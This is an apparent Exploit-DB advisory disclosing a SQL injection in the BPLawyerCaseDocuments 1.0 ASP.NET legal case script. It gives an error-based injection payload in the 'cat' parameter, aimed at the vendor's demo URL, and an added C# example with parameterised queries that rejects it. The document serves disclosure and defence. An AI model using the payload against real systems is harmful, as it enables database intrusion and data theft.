BPLawyerCaseDocuments - SQL Injection

EDB-ID: 9834
Author: OoN Boy
Type: webapps
Platform: ASP
Date: 2009-09-22


[x]========================================================================================================================================[x]
 |                                                      AntiSecurity[dot]org                                                                |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Title    		: BPLawyerCaseDocument 1.0 MSSQL Vulnerabilities								    |
 | Software 		: BPLawyerCaseDocument												    |
 | Vendor   		: http://bpowerhouse.info											    |
 | Demo			: http://www.bpowerhouse.info/BPLawyerCaseDocuments								    |
 | Date    		: 22 September 2009 ( Indonesia )										    |
 | Author   		: OoN_Boy													    |
 | Contact  		: oon.boy9@gmail.com												    |
 | Web	    		: http://oonboy.info												    |
 | Blog     		: http://oonboy.blogspot.com											    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Technology		: ASP.NET 2.0                                                                                                       |
 | Database		: MSSQL 2005                                                                                                        |
 | Version		: 1.0         		                                                                                            |
 | License		: GNU GPL                                                                                                           |
 | Price		: $29.00                                                                                                            |
 | Description		: A script where lawyers can manage cases and deal with case documents in an easy way. The script allows	    |
 |			  attorneys and law offices to manage and view case documents. It includes an agent panel where agents can log in and|
 |			  manage client information, and an administrator panel where the site administrator can have control of all	    |
 |			  data														    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Google Dork 		: find it yourself :)												    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Exploit 		: http://localhost/[path]/employee.aspx?cat=[sql]				 	 			    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Proof of concept	: http://www.bpowerhouse.info/BPLawyerCaseDocuments/employee.aspx?cat=1+and+1=convert(int,@@version)--		    |
 |			  you must log in to test											    |
[x]========================================================================================================================================[x]
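
Added example, not part of the original advisory and not the vendor's code: one way an ASP.NET handler can treat the cat parameter so that the value in the proof of concept above is rejected and never reaches the SQL text. The class, table and column names (EmployeeQuery, Employees, CategoryId, EmployeeId, Name) are hypothetical, since the advisory does not show the application's code or schema.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;   // .NET Framework; Microsoft.Data.SqlClient on modern .NET
using System.Globalization;

// Hypothetical names throughout: the real page code and schema are not in the advisory.
public static class EmployeeQuery
{
    // Vulnerable pattern the proof of concept implies (do not use):
    //   "SELECT ... WHERE CategoryId = " + Request.QueryString["cat"]
    // With that pattern, text placed in cat becomes part of the T-SQL statement.

    // Accept digits only: no sign, whitespace, hex or thousands separators.
    public static bool TryParseCategory(string raw, out int category)
    {
        return int.TryParse(raw, NumberStyles.None,
                            CultureInfo.InvariantCulture, out category);
    }

    // Bind cat as a typed parameter; it is never concatenated into the SQL text.
    public static SqlCommand BuildCommand(int category)
    {
        SqlCommand cmd = new SqlCommand(
            "SELECT EmployeeId, Name FROM Employees WHERE CategoryId = @cat");
        cmd.Parameters.Add("@cat", SqlDbType.Int).Value = category;
        return cmd;
    }

    public static void Main()
    {
        // Constructed inputs: a normal value, and the advisory's PoC value as the
        // server sees it after URL decoding ('+' becomes a space).
        string[] samples = { "1", "1 and 1=convert(int,@@version)--" };
        foreach (string raw in samples)
        {
            int category;
            if (!TryParseCategory(raw, out category))
            {
                Console.WriteLine("rejected: {0}", raw);   // respond 400 and log it
                continue;
            }
            using (SqlCommand cmd = BuildCommand(category))
                Console.WriteLine("accepted: {0} -> {1} [@cat={2}]",
                    raw, cmd.CommandText, cmd.Parameters["@cat"].Value);
        }
    }
}
```

The proof of concept relies on the int conversion error text being returned to the client, so enabling custom error pages (customErrors mode="On" in web.config) removes that output channel. It does not fix the injection itself; the parameter binding does.
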



[x]========================================================================================================================================[x]
 | Greetz		: antisecurity.org batamhacker.or.id                                                                                |
 |		 	  Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va                       |
 | 		  	  k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere                  |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Note			: Happy Eid al-Fitr, I ask forgiveness in body and soul; forgive my mistakes up to now, all :)			    |
 |			  running off.... for a while.... bye bye.....									    |
[x]========================================================================================================================================[x]